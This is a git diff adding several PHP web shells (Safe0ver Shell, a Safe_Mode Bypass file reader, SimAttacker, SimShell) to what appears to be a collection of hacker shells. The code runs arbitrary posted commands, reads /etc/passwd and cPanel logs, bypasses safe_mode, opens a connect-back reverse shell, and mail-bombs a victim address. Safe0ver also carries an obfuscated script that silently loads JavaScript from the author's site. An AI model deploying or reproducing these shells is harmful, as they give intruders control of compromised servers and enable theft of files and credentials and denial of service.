+    if (!file_exists("$downloadfile"))
+        echo "The file does not exist";
+    else {
+        $size = @filesize("$downloadfile");
+        if ($size != false) {
+            $add="; size=$size";
+        }            
+        else {
+            $add="";
+        }
+         header("Content-Type: application/download");
+        header("Content-Disposition: attachment; filename=$downloadto$add");
+        $fp=fopen("$downloadfile" ,"rb");
+        fpassthru($fp);
+        flush();
+    }
+}
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+       ?>
+    <center>
+     <table>
+      <tr>
+       <td NOWRAP>
+            Dosya Y�kleme Sekmesine Tikladiniz !
+        <br> Eger Y�klemek istediginiz Dosya mevcut ise �zerine Yazilir.<br><br>
+      <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+             <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+             <input type="hidden" name="cmd" value="uploadproc">
+             <input type="hidden" name="dir" value="<?php echo $dir ?>">
+             <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+             <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+             Dosya Y�kle:<br>
+             <input size="75" name="userfile" type="file"><br>
+             <input type="submit" value="Y�kle">
+      </form>
+        <br>
+         <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+            <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+            <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+            <input tabindex="0" type="submit" value="Iptal">
+        </form>
+    </td>
+   </tr>
+ </table>
+    </center>
+
+     <?php
+}
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+    echo "<center><table><tr><td NOWRAP>";
+    if (file_exists($userfile))
+        $res = copy($userfile, "$dir/$userfile_name");
+    echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+         if ($res) {
+        echo "Basariyla Y�klendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+        echo "Y�klenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
+        echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+    }
+    else {
+        echo "Y�klenemedi...";
+    }
+    echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form></center>" ;
+    echo "<br><br></td></tr></table></center>";
+}
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+        echo "<hr>"; 
+    $fc = @file( $file );      while ( @list( $ln, $line ) = each( $fc ) ) {
+          echo spacetonbsp(@htmlentities($line))."<br>\n";
+      }
+    echo "<hr>";
+}
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+         if (function_exists('is_dir')) {
+         if (is_dir("$oldfile")) {
+             $objname = "Directory";
+             $objident = "Directory";
+          }
+         else {
+             $objname = "Filename";
+             $objident = "file";
+         }
+     }
+       echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+    If (empty($newfile) != true) {
+         echo "<center>";
+         $return = @rename($oldfile, "$olddir$newfile");
+        if ($return) {
+             echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+         }
+         else {
+             if ( @file_exists("$olddir$newfile") ) {
+                 echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+             }
+             else {
+                 echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+             }
+          }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form></center>" ;
+     }
+     else {
+         $dpos = strrpos($oldfile, "/");
+         if (strval($dpos)!="") {
+             $olddir = substr($oldfile, 0, $dpos+1);
+           }
+         else {
+             $olddir = "$lastdir/";
+        }
+         $fpos = strrpos($oldfile, "/");
+         if (strval($fpos)!="") {
+             $inputfile = substr($oldfile, $fpos+1);
+           }
+         else {
+             $inputfile = "";
+         }
+               echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+         echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+         echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+         echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+         echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+         echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+         echo "Rename \"$oldfile\" to:<br>\n";
+         echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+        echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+         echo "</td></tr></table></center>";
+     }
+}
+else if ( $cmd == "con") {
+
+?>
+<center>
+<table>
+ <tr><td>&nbsp;</td>
+ </tr></table>
+<?php
+}    
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+    $isMainMenu = true;
+     ?>
+    <table width="100%" border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="border">
+       <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+    <br>
+     <center>
+    <table border="0" NOWRAP>
+      <tr>
+      <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?>      </td>
+       <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass �zelligi Eklenmis Ve B�ylece Tahrip G�c� Y�kseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya S�m�ren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullan�m:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
+        </span></td>
+     </tr>
+       </table>
+    <br><p><br>Safe Mode ByPAss<p><form method="POST">
+	<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
+	<input type="submit" value="�alistir"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="dizin">
+                <option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
+		<option value="cat /etc/passwd">cat /etc/passwd</option>
+		<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
+		<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
+		<option value="cat /etc/hosts">cat /etc/hosts</option>
+                <option value="cat /etc/named.conf">cat /etc/named.conf</option>
+                <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
+                <option value="netstat -an | grep -i listen">A�ik Portlar</option>
+                <option value="ps -aux">�alisan Uygulamalar</option>
+</select> <input type="submit" value="�alistir"></p>
+	</form>
+------------------------------------------------------------------------------------<p>
+<?
+$evilc0der=$_POST['dizin'];
+if($_POST['dizin'])
+{
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$safemodgec = shell_exec($evilc0der);
+echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
+}
+?>
+<Script Language='Javascript'>
+<!-- HTML Encryption provided by iWEBTOOL.com -->
+<!--
+document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
+//-->
+</Script>
+</center>
+    <br>
+     <?php
+}
+
+if ($cmd != "downl") {
+    if ( $isMainMenu != true) {
+         ?>
+
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+         <tr>
+          <td width="100%" style="class="silver border">
+           <center><strong>
+            &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+            &nbsp;&nbsp;&nbsp;&nbsp;
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+            </strong></center>
+          </td>
+         </tr>
+        </table>
+        <br>
+        <?php
+}
+    ?>
+    <table width=100% border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="silver border">
+       <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+        </td>
+  </tr>
+ </table>
+
+  <?php
+ }
+
+?> 
+
+
+
+
+ 
+
+
+
+
+
diff --git a/xakep-shells/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt b/xakep-shells/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt
new file mode 100644
index 0000000..ac5dc38
--- /dev/null
+++ b/xakep-shells/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt	
@@ -0,0 +1,89 @@
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+</head>
+<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
+<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="?	"><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe 
+Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
+<form method="POST">
+	<p align="center"><input type="text" name="file" size="20">
+	<input type="submit" value="Open" name="B1"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="file">
+		<option value="/etc/passwd">Get /etc/passwd</option>
+		<option value="/var/cpanel/accounting.log">View cpanel logs</option>
+		<option value="/etc/syslog.conf">Syslog configuration</option>
+		<option value="/etc/hosts">Hosts</option>
+		</select> <input type="submit" value="Go" name="B1"></p>
+	</form>
+
+
+<?php
+/*
+Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
+by PHP Emperor<xb5@hotmail.com>
+*/
+
+echo "<head><title>Safe Mode Shell</title></head>"; 
+
+
+
+
+$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
+
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+echo "<PRE>\n";
+if(empty($file)){
+if(empty($_GET['file'])){
+if(empty($_POST['file'])){
+die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
+COLOR=\"RED\">PHP Emperor
+xb5@hotmail.com</FONT></CENTER></B>");
+} else {
+$file=$_POST['file'];
+}
+} else {
+$file=$_GET['file'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "<B>--- Start File ".htmlspecialchars($file)."
+-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
+".htmlspecialchars($file)." ---------------\n";
+unlink($temp);
+die("\n<FONT COLOR=\"RED\"><B>File
+".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
+;]</B></FONT>");
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt b/xakep-shells/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt
new file mode 100644
index 0000000..9d41bb6
--- /dev/null
+++ b/xakep-shells/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt	
@@ -0,0 +1,378 @@
+<?
+//download Files  Code
+$fdownload=$_GET['fdownload'];
+if ($fdownload <> "" ){
+// path & file name
+$path_parts = pathinfo("$fdownload");
+$entrypath=$path_parts["basename"];
+$name = "$fdownload";
+$fp = fopen($name, 'rb');
+header("Content-Disposition: attachment; filename=$entrypath");
+header("Content-Length: " . filesize($name));
+fpassthru($fp);
+exit;
+}
+?>
+	
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
+<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
+<style>
+<!--
+body         { font-family: Tahoma; font-size: 8pt }
+-->
+</style>
+</head>
+<body>
+<?
+error_reporting(E_ERROR | E_WARNING | E_PARSE);
+
+ //File Edit
+ $fedit=$_GET['fedit'];
+ if ($fedit <> "" ){
+ $fedit=realpath($fedit);
+ $lines = file($fedit);
+ echo "<form action='' method='POST'>";
+echo "<textarea name='savefile' rows=30 cols=80>" ;
+foreach ($lines as $line_num => $line) {
+ echo htmlspecialchars($line);
+}
+echo "</textarea>
+	<input type='text' name='filepath'  size='60' value='$fedit'>
+	<input type='submit' value='save'></form>";
+	$savefile=$_POST['savefile'];
+	$filepath=realpath($_POST['filepath']);
+	if ($savefile <> "") 
+	{
+	$fp=fopen("$filepath","w+");
+	fwrite ($fp,"") ;
+	fwrite ($fp,$savefile) ;
+	fclose($fp);
+	echo "<script language='javascript'> close()</script>";
+	}
+exit();
+ }
+?>
+<?
+// CHmod - PRimission
+$fchmod=$_GET['fchmod'];
+if ($fchmod <> "" ){
+$fchmod=realpath($fchmod);
+echo "<center><br>
+chmod for :$fchmod<br>
+<form method='POST' action=''><br>
+Chmod :<br>
+<input type='text' name='chmod0' ><br>
+<input type='submit' value='change chmod'>
+</form>";
+$chmod0=$_POST['chmod0'];
+if ($chmod0 <> ""){
+chmod ($fchmod , $chmod0);
+}else {
+echo "primission Not Allow change Chmod";
+}
+exit();
+}
+?>
+	
+<div align="center">
+	<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
+		<tr>
+			<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
+				<p align="center"><b>
+				<font face="Tahoma" size="2"><br>
+				</font>
+				<font color="#D2D200" face="Tahoma" size="2">
+				<span style="text-decoration: none">
+				<font color="#000000">
+				<a href="?id=fm&dir=<?
+	echo getcwd();
+	?>
+	">
+				<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
+				<p align="center"><b><a href="?id=cmd">
+				<span style="text-decoration: none">
+				<font face="Tahoma" size="2" color="#000000">
+				CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
+				<p align="center"><b><a href="?id=fake-mail">
+				<font face="Tahoma" size="2" color="#000000">
+				<span style="text-decoration: none">Fake mail</span></font></a></b></p>
+				<p align="center"><b>
+				<font face="Tahoma" size="2" color="#000000">
+				<a href="?id=cshell">
+				<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
+				<p align="center"><b>
+				<font color="#000000" face="Tahoma" size="2">
+				<a href="?id=">
+				<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
+				<p>&nbsp;<p align="center">&nbsp;</td>
+			<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
+			<?
+			//*******************************************************
+			//Start Programs About US
+			$id=$_GET['id'];
+
+			if ($id=="") {
+			echo "
+			<font face='Arial Black' color='#808080' size='1'>
+***************************************************************************<br>
+&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
+&nbsp;Programer : Hossein Asgary <br>
+&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
+&nbsp;please : If you find bug or problems in program , tell me by : <br>
+&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
+Enjoy :) [Only 4 Best Friends ] <br>
+***************************************************************************</font></span></p>
+";
+
+echo "<font color='#333333' size='2'>OS :". php_uname();
+echo "<br>IP :". 
+($_SERVER['REMOTE_ADDR']);
+echo "</font>";
+
+
+			}
+			//************************************************************
+			//cmd-command line
+			$cmd=$_POST['cmd'];
+			if($id=="cmd"){
+		$result=shell_exec("$cmd");
+		echo "<br><center><h3> CMD ExeCute </h3></center>" ;
+		echo "<center>
+		<textarea rows=20 cols=70 >$result</textarea><br>
+		<form method='POST' action=''>
+		<input type='hidden' name='id' value='cmd'>
+		<input type='text' size='80' name='cmd' value='$cmd'>
+		<input type='submit' value='cmd'><br>";
+			
+			
+			
+			}
+			
+		//********************************************************	
+		
+		//fake mail = Use victim server 4 DOS - fake mail 
+		if ( $id=="fake-mail"){
+		error_reporting(0);
+		echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
+		echo "<center><form method='post' action=''>
+		Victim Mail :<br><input type='text' name='to' ><br>
+		Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
+		Comments:
+		<br>
+		<textarea rows='10' cols=50 name='Comments' ></textarea><br>
+		<input type='submit' value='Send Mail Strm ' >
+		</form></center>";
+		//send Storm Mail
+		$to=$_POST['to'];
+		$nom=$_POST['nom'];
+		$Comments=$_POST['Comments'];
+		if ($to <> "" ){
+		for ($i = 0; $i < $nom ; $i++){
+		$from = rand (71,1020000000)."@"."Attacker.com";
+		$subject= md5("$from");
+        mail($to,$subject,$Comments,"From:$from");
+        echo "$i is ok";
+        }      
+        echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
+        }
+		}
+		//********************************************************
+
+			//Connect Back -Firewall Bypass
+			if ($id=="cshell"){
+			echo "<br>Connect back Shell , bypass Firewalls<br>
+			For user :<br>
+			nc -l -p 1019 <br>
+			<hr>
+			<form method='POST' action=''><br>
+			Your IP & BindPort:<br>
+			<input type='text' name='mip' >
+			<input type='text' name='bport' size='5' value='1019'><br>
+			<input type='submit' value='Connect Back'>
+			</form>";
+		 $mip=$_POST['mip'];
+		 $bport=$_POST['bport'];
+		 if ($mip <> "")
+		 {
+		 $fp=fsockopen($mip , $bport , $errno, $errstr);
+		 if (!$fp){
+		       $result = "Error: could not open socket connection";
+		 }
+		 else {
+		 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
+	  while(!feof($fp)){ 
+       fputs ($fp," bash # ");
+       $result= fgets ($fp, 4096);
+      $message=`$result`;
+       fputs ($fp,"--> ".$message."\n");
+      }
+      fclose ($fp);
+		 }
+		 }
+			}
+			
+		//********************************************************
+			//Spy File Manager
+			$homedir=getcwd();
+			$dir=realpath($_GET['dir'])."/";
+			if ($id=="fm"){
+			echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
+                  &nbsp;<b>
+                  <form action='' method='GET'>
+                  &nbsp;Path:</b>
+                  <input type='hidden' name='id' value='fm'>
+                  <input type='text' name='dir' size='80' value='$dir'>
+                  <input type='submit' value='dir'>
+                  </form>
+                 <br>";
+
+			echo "
+
+<div align='center'>
+
+<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
+	<tr>
+		<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
+		<td height='28' width='82' align='center'>
+		<font color='#000080' size='2'><b>Size KByte</b></font></td>
+		<td height='28' width='83' align='center'>
+		<font color='#008000' size='2'><b>Download</b></font></td>
+		<td height='28' width='66' align='center'>
+		<font color='#FF9933' size='2'><b>Edit</b></font></td>
+		<td height='28' width='75' align='center'>
+		<font color='#999999' size='2'><b>Chmod</b></font></td>
+		<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
+	</tr>";
+		    if (is_dir($dir)){
+		    if ($dh=opendir($dir)){
+		    while (($file = readdir($dh)) !== false) {
+		    $fsize=round(filesize($dir . $file)/1024);
+		
+		    
+	echo " 
+	<tr>
+		<th width='250' height='22' align='left' nowrap>";
+		if (is_dir($dir.$file))
+		{
+		echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
+		}
+		else {
+		echo "<font size='2' color='#666666'>&nbsp;$file ";
+		}
+		echo "</a></font></th>
+		<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
+		if (is_file($dir.$file))
+		{
+		echo "$fsize";
+		}
+		else {
+		echo "&nbsp; ";
+		}
+		echo "
+		</b></font></td>
+		<td width='103' align='center' nowrap>";
+		if (is_file($dir.$file)){
+		if (is_readable($dir.$file)){
+		echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='77' align='center' nowrap>";
+		if (is_file($dir.$file))
+		{
+		if (is_readable($dir.$file)){
+		echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='86' align='center' nowrap>";
+		if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+		echo "<font size='1' color='#999999'>Dont in windows";
+		}
+		else {
+		echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
+		}
+		echo "</a></font></td>
+		<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
+	</tr>
+	";
+		      }
+		      closedir($dh);
+		    } 
+		    }
+		    echo "</table>
+<form enctype='multipart/form-data' action='' method='POST'>
+ <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
+ Send this file: <input name='userfile' type='file' />
+ <inpt type='hidden' name='Fupath'  value='$dir'>
+ <input type='submit' value='Send File' />
+</form> 
+		    </div>";
+			}
+//Upload Files 
+$rpath=$_GET['dir'];
+if ($rpath <> "") {
+$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
+echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
+echo "<script language='javascript'> history.back(2)</script>";
+}
+ }
+ //file deleted
+$frpath=$_GET['fdelete'];
+if ($frpath <> "") {
+if (is_dir($frpath)){
+$matches = glob($frpath . '/*.*');
+if ( is_array ( $matches ) ) {
+  foreach ( $matches as $filename) {
+  unlink ($filename);
+  rmdir("$frpath");
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+echo "<script language='javascript'> history.back(1)</script>";
+  }
+  }
+  }
+  else{
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+unlink ("$frpath");
+echo "<script language='javascript'> history.back(1)</script>";
+exit(0);
+
+  }
+  
+
+}
+			?>
+			
+			</td>
+		</tr>
+		<tr>
+			<td style="border: 1px dotted #FFCC66">
+			<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
+			Copyright 2004-Simorgh Security<br>
+			Hossein-Asgari<br>
+			</font><font color="#c0c0c0" size="1" face="Tahoma">
+		<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
+		<font color="#666666">www.simorgh-ev.com</font></a></font></td>
+		</tr>
+	</table>
+</div>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/SimShell 1.0 - Simorgh Security MGZ.php.txt b/xakep-shells/PHP/SimShell 1.0 - Simorgh Security MGZ.php.txt
new file mode 100644
index 0000000..2fff063
--- /dev/null
+++ b/xakep-shells/PHP/SimShell 1.0 - Simorgh Security MGZ.php.txt	
@@ -0,0 +1,180 @@
+<?php
+
+/*Simorgh Security Magazine */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
